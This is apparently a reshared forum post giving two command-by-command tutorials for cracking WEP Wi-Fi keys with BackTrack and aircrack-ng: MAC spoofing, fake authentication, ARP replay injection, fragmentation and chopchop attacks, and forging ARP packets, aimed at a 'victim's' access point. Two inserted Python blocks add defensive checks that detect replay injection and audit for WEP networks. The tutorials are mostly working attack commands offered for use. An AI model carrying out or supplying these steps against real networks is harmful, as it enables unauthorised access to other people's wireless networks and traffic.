Kartikey Sapra
just found it on some site, so thought of sharing it with you guys

method one:

* 1 copy of BackTrack 3 *newest release* (GOOGLE IT)
* 1 wireless router
* Laptop with wireless capabilities/wireless card -- There are a few cards that can't do the injection!!!
* A secure place to work (so you don't disturb other AP's)

In order to crack a WEP key you must have a large number of encrypted packets to work with. This is an unavoidable requirement if you wish to be successful. The best way to get a large number of packets is to perform an ARP request re-injection attack (otherwise known as attack -3). In order to do this attack and get results there must be a client already authenticated with the AP, or connecting to the AP.

************************************************** *********************
Here are some things you need to know before you get confused:
When you see this (device) or (bssid) you DON'T put the ( )!!!
(device) = Your wireless card *can be seen by typing in iwconfig, EG: eth0, eth1, ath0, ath1
(bssid) = This is the victim's bssid *when you start airodump-ng, if there is an AP in range it will show up on the left side and will look similar to 00:11:22:33:44:55
************************************************** **********************

Now before we start we need to make a txt file in the home folder. On the desktop you will see 2 icons, home and system. Double click the home icon, right-click the blank white area and select Create New > Txt File, name it j4m13 or whatever you want! Click OK, now close the window.

Ok let's start!
Commands | Meaning

* Open up 3 shell konsoles by clicking the little black box next to the start button.

* The first thing we're going to do is stop the device aka ethernet card
airmon-ng stop ath0

* Now we're going to put the wireless card down, so we can fake a MAC address (to see available wireless cards type iwconfig)
ifconfig (device) down

* OK, now just to make things simpler, so we don't have to hunt down what our MAC address is
macchanger --mac 00:11:22:33:44:55 (device)

* Now we're going to start the wireless card *make it listen for AP's
airmon-ng start (device)

* Let's start seeing what AP's are there
airodump-ng (device)

* After you see all the AP's execute the following to stop it and copy the bssid
CTRL+C, then copy the bssid of the customer

* Now on to the customer's AP (we're listening in for authentication packets)
airodump-ng -c 6 -w j4m13 --bssid (bssid) (device)

* Let's get on with making more data, and start the injection process
aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 (device)

* Now we're going to inject the router ***this sometimes takes a while to actually inject!
aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 (device)

* On to cracking the key, ***AFTER GETTING AT LEAST 5,000 Data/IVs for 64-bit encryption / AFTER GETTING AT LEAST 10,000 Data/IVs for 128-bit encryption
aircrack-ng -n 64 --bssid (bssid) j4m13-01.cap

* Once you crack the WEP key, write it down and reboot to Windows. Now put it in the username and the password without the colons.
EG: WEP Key = 33:C7:C6:09:30
When entered into username and password it will look like this: 33C7C60930
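Added here as a defensive check, not part of the original tutorial: the ARP re-injection step above works by re-sending one captured frame unchanged, so on the wire it shows up as one station repeating the same IV and frame length hundreds of times a second. The detector below runs over constructed frame metadata (timestamp, source MAC, BSSID, IV, length); the BSSID and the normal client MAC are made-up values, and the threshold and window are assumed tuning values.

```python
"""Detect ARP-request replay injection (the aireplay-ng -3 style traffic above)
from 802.11 data-frame metadata. Each WEP frame should carry a fresh 24-bit IV;
a replayed ARP request re-sends one captured frame unchanged, so a single
(source MAC, IV, length) tuple repeats hundreds of times per second.
The frame records below are constructed sample data, not a real capture."""
from collections import defaultdict

# Constructed sample: (timestamp in s, source MAC, BSSID, IV as hex, frame length)
SAMPLE_FRAMES = [
    # ordinary client traffic: the IV changes on every frame
    (0.00, "00:0c:29:aa:bb:cc", "02:00:00:00:01:00", "1a2b3c", 342),
    (0.20, "00:0c:29:aa:bb:cc", "02:00:00:00:01:00", "1a2b3d", 118),
    (0.41, "00:0c:29:aa:bb:cc", "02:00:00:00:01:00", "1a2b3e", 1510),
] + [
    # replayed 68-byte ARP request from the spoofed MAC used in the tutorial:
    # identical IV and length, 500 frames inside one second
    (1.0 + i * 0.002, "00:11:22:33:44:55", "02:00:00:00:01:00", "9f0e1d", 68)
    for i in range(500)
]

REPLAY_THRESHOLD = 50   # identical frames from one source ... (assumed tuning)
WINDOW_SECONDS = 1.0    # ... within this sliding window

def find_replay_sources(frames, threshold=REPLAY_THRESHOLD, window=WINDOW_SECONDS):
    """Return {source MAC: (iv, max_count, frames_per_second)} for every source
    that repeats one (IV, length) pair at least `threshold` times in `window` s."""
    buckets = defaultdict(list)  # (src, iv, length) -> timestamps
    for ts, src, _bssid, iv, length in frames:
        buckets[(src, iv, length)].append(ts)
    alerts = {}
    for (src, iv, _length), stamps in buckets.items():
        stamps.sort()
        start = 0
        for end in range(len(stamps)):  # densest window ending at each frame
            while stamps[end] - stamps[start] > window:
                start += 1
            count = end - start + 1
            if count >= threshold and count > alerts.get(src, ("", 0, 0))[1]:
                span = max(stamps[end] - stamps[start], 1e-3)
                alerts[src] = (iv, count, round(count / span))
    return alerts

def replay_report(frames):
    """Human-readable verdict per flagged source (empty list when clean)."""
    return [f"{src}: {n} frames reusing IV {iv} (~{pps}/s) -> ARP replay injection"
            for src, (iv, n, pps) in find_replay_sources(frames).items()]
```

On a real capture, feed the same tuples from your own sniffer and expect the spoofed station to be the only source that trips the rule; genuine clients never repeat an IV at that rate.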

method two:

************************************************** ************************************
How to crack WEP encryption with NO clients.
************************************************** ************************************

************************************************** ************************************
************************************************** ************************************

I'm assuming you followed the above tut so I can jump right into this...

-Make sure there is some data coming from the access point. Beacons and other packets are useless for this method.
-Make sure the WEP is "open authentication"; "shared key authentication" will not work with this method.
-Make sure you DO NOT spoof your wireless card's MAC.

-We will be using the following key so that we're all on the same page and understanding...
-Your wireless card's MAC address= (MY MAC)
-MAC address of access point you are trying to crack= (BSSID)
-Access point's name= (ESSID)
-Access point's channel= (AP CH)
-Your wireless interface= (ATH0)
-Comments will be displayed within these brackets. -[example]-
-Commands will start with $ -[$example]-
-Make sure you gather the necessary information listed above for the access point you will be owning. Follow along and change the necessary fields as needed.

************************************************** ************************************
************************************************** ************************************

************************************************** ************************************
************************************************** ************************************

-There are seven (7) steps to this procedure.
-1. Start your wireless interface in monitor mode on channel (AP CH).
-2. Use aireplay-ng to do a fake authentication with the access point.
-3. Use the aireplay-ng chopchop or fragmentation attack to obtain PRGA. -[pseudo random generation algorithm]-
-4. Use packetforge-ng to create an ARP packet using the PRGA obtained in the previous step.
-5. Start airodump-ng on (AP CH) with a filter for (BSSID) to collect the new unique IVs. -[Initialization Vector]-
-6. Inject the ARP packet created in step 4.
-7. Run aircrack-ng to crack the key using the IVs collected.

************************************************** ************************************
************************************************** ************************************

-STEP ONE (1) start the wireless interface in monitor mode on (AP CH). Open a console and enter...

$airmon-ng start wifi0 (AP CH)

-[In this command we use "wifi0" instead of (ATH0). This is because the madwifi-ng drivers are being used.]-

-To confirm your wireless card is in fact in monitor mode enter...


-[Mode should read "Monitor"]-

-[To match your wireless card frequency to the (AP CH) use this chart ]-

************************************************** ************************************
************************************************** ************************************

-STEP TWO (2) use aireplay-ng to do a fake authentication with the access point...

$aireplay-ng -1 0 -e (ESSID) -a (BSSID) -h (MY MAC) (ATH0)

-[-1 means fake authentication, 0 is the reassociation timing in seconds, -a is the access point, -h is your MAC]-

-[One of two things will happen after this command. Either "Association successful :-)" or it will go into a loop of "Authentication successful, Sending Association Request". Some access points are configured to only allow selected MAC addresses to associate and connect. If this is the case, you will not be able to successfully do fake authentication unless you know one of the MAC addresses on the allowed list and that is another tutorial all its own ;] ]-

************************************************** ************************************
************************************************** ************************************

-STEP THREE (3) use the aireplay-ng chopchop or fragmentation attack to obtain PRGA. Start another console and enter...

$aireplay-ng -5 -b (BSSID) -h (MY MAC) (ATH0)

-[-5 means the fragmentation attack]-
-[This PRGA is not the WEP key and cannot be used to decrypt packets, but it will later be used to create new packets for injection.]-
-[Either the chopchop or fragmentation attack can be used to obtain the PRGA bit file. The result is the same.]-
-[If one does not work, try the other.]-

When a packet from the access point arrives hit the "y" key to proceed.

-[You might need to try a few packets to be successful]-

If successful, the system responds:

"Saving chosen packet in replay_src-0203-180328.cap
Data packet found!
Sending fragmented packet
Got RELAYED packet!!
Thats our ARP packet!
Trying to get 384 bytes of a keystream
Got RELAYED packet!!
Thats our ARP packet!
Trying to get 1500 bytes of a keystream
Got RELAYED packet!!
Thats our ARP packet!
Saving keystream in fragment-0203-180343.xor
Now you can build a packet with packetforge-ng out of that 1500 bytes keystream"

-[That is only an example; your system will save the .xor file under a different name]-

If the fragmentation attack was not successful, you can then try the chopchop technique next by running...

$aireplay-ng -4 -h (MY MAC) -b (BSSID) (ATH0)

-[-4 means the chopchop attack]-

Once again respond "y" and the machine will recreate the ARP header.

The .xor file which the machine saves can be used in the next step to generate your much needed ARP packet.

-[Make sure the packet is 68 or more bytes, otherwise you may not have enough PRGA data to subsequently generate a packet.]-
-[If the first packet you select does not work, then try a few others. Sometimes it takes more than one try to be successful with either attack.]-

************************************************** ************************************
************************************************** ************************************

STEP FOUR (4) use packetforge-ng to create an ARP packet...

$packetforge-ng -0 -a (BSSID) -h (MY MAC) -k (DEST IP) -l (SRC IP) -y .xor -w arp-request

-[-0 means generate an ARP packet, -k is the destination IP, -l is the source IP, -y .xor is the file to read the PRGA from, -w arp-request is the name of the file to write the ARP packet to]-

-[.xor: make sure you input the correct file name from step 3, ex. fragment-8738-927426.xor]-

The system will respond:

"Wrote packet to: arp-request"

************************************************** ************************************
************************************************** ************************************

STEP FIVE (5) open another console and start airodump-ng...

$airodump-ng -c (AP CH) --bssid (BSSID) -w capture (ATH0)

-[-w capture is the file name prefix for the file which will contain the captured packets.]-

************************************************** ************************************
************************************************** ************************************

STEP SIX (6) inject the ARP packet. Using the console session where you generated the ARP packet, enter...

$aireplay-ng -2 -r arp-request (ATH0)

-[-2 means use interactive frame selection]-
-[-r arp-request defines the file name from which to read the ARP packet]-

Enter "y" to use the packet. The system kindly responds by showing how many packets it is injecting and is smart enough to remind you to start airodump-ng if it has not already been started.

-[If the BSSID data packets are not increasing, make sure you are still associated with the access point.]-

************************************************** ************************************
************************************************** ************************************

STEP SEVEN (7) Run aircrack-ng to obtain the WEP key. Start another console session and enter...

$aircrack-ng -b (BSSID) capture*.cap

-[capture*.cap selects all dump files starting with "capture" and ending in "cap".]-

You can run this while generating packets. Go raid your fridge for a bite and drink while the WEP key is being cracked.

************************************************** ************************************
************************************************** ************************************

This might seem like a very long process, but don't be discouraged; it should take you no more than 45 minutes to complete. It took me longer to write this tut than it's going to take you to execute. The more you do it and the more you familiarize yourself with the commands, the sooner you will be able to do it from brain memory.
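Added as a defender's audit and not part of the original tutorial: the clientless procedure above only produces a key because the access point still runs WEP and because its "# IV" counter climbs by thousands while frames are being injected (step 5 collects exactly that). The script below reads two airodump-ng CSV snapshots of your own network taken a known number of seconds apart, lists WEP access points and flags any whose IV rate is far above what real traffic produces. The snapshots are constructed sample data in the column layout airodump-ng writes to its <prefix>-01.csv file (assumed header names as shown), and the 100 IV/s threshold is an assumed tuning value.

```python
"""Audit airodump-ng CSV snapshots taken a known number of seconds apart:
list every access point still using WEP and flag any whose unique-IV count
("# IV") climbs far faster than real client traffic would explain, the
signature of the injection described above. Both snapshots are constructed
sample data in the column layout airodump-ng writes to <prefix>-01.csv
(assumed header names as shown; station rows have fewer columns and are skipped)."""
import csv
import io

HEADER = ("BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, "
          "Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key\n")
SNAPSHOT_T0 = HEADER + (
    "02:00:00:00:01:00, 2008-02-03 18:00:01, 2008-02-03 18:03:28,  6, 54, WEP , WEP, OPN, -41, 120, 312, 0. 0. 0. 0, 10, lab-wep-ap, \n"
    "02:00:00:00:02:00, 2008-02-03 18:00:02, 2008-02-03 18:03:28, 11, 54, WPA2, CCMP, PSK, -60, 118, 0, 0. 0. 0. 0, 11, lab-wpa2-ap, \n")
SNAPSHOT_T1 = HEADER + (  # 60 s later: the WEP AP has gained 25,518 IVs
    "02:00:00:00:01:00, 2008-02-03 18:00:01, 2008-02-03 18:04:28,  6, 54, WEP , WEP, OPN, -41, 180, 25830, 0. 0. 0. 0, 10, lab-wep-ap, \n"
    "02:00:00:00:02:00, 2008-02-03 18:00:02, 2008-02-03 18:04:28, 11, 54, WPA2, CCMP, PSK, -60, 178, 0, 0. 0. 0. 0, 11, lab-wpa2-ap, \n")

def parse_ap_rows(text):
    """Map BSSID -> {channel, privacy, ivs, essid} from the access-point table."""
    rows = {}
    for row in csv.reader(io.StringIO(text), skipinitialspace=True):
        if len(row) < 14 or row[0] == "BSSID":
            continue  # header, blank line or a station-table row
        rows[row[0]] = {"channel": int(row[3]), "privacy": row[5].strip(),
                        "ivs": int(row[10]), "essid": row[13].strip()}
    return rows

def wep_networks(rows):
    """(BSSID, ESSID) pairs whose Privacy column reports WEP: migrate these."""
    return sorted((b, r["essid"]) for b, r in rows.items() if "WEP" in r["privacy"])

def iv_rates(rows_t0, rows_t1, elapsed_s):
    """Unique IVs gained per second between the two snapshots, per BSSID."""
    return {b: (rows_t1[b]["ivs"] - rows_t0[b]["ivs"]) / elapsed_s
            for b in rows_t1 if b in rows_t0}

def injection_suspects(rates, threshold=100.0):
    """A healthy WEP cell yields a few IVs/s; hundreds/s means frames are being
    replayed into it (threshold is an assumed tuning value)."""
    return sorted(b for b, r in rates.items() if r >= threshold)
```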